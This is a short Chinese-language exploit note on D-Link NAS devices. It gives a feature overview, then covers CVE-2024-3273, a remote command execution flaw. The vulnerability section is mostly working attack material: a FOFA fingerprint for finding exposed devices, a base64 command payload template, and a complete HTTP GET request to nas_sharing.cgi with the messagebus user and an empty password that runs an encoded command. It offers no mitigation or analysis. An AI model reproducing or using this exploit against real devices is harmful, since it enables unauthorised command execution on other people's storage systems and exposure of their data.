简介

D-Link NAS(网络附加存储)设备为家庭和小型企业提供了一种便捷的数据存储和共享解决方案

  • 数据存储与备份:支持大容量硬盘,提供集中存储和自动备份功能。
  • 文件共享:支持SMB/CIFS、NFS、FTP等协议,方便多用户访问。
  • 远程访问:通过D-Link的mydlink服务,用户可远程访问和管理NAS数据。
  • 多媒体支持:内置DLNA和UPnP AV媒体服务器,支持流媒体播放。
  • 数据安全:支持RAID、密码保护和加密技术,确保数据安全。

漏洞

CVE-2024-3273远程命令执行

  • fofa指纹:_fid=”hWN+yVVhLzKJaLkd/ITHpA==”

  • payload:system={{base64_enc(cmd)}}

1
2
3
4
5
6
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: identity
Accept: */*
Connection: keep-alive

image-20250212143334760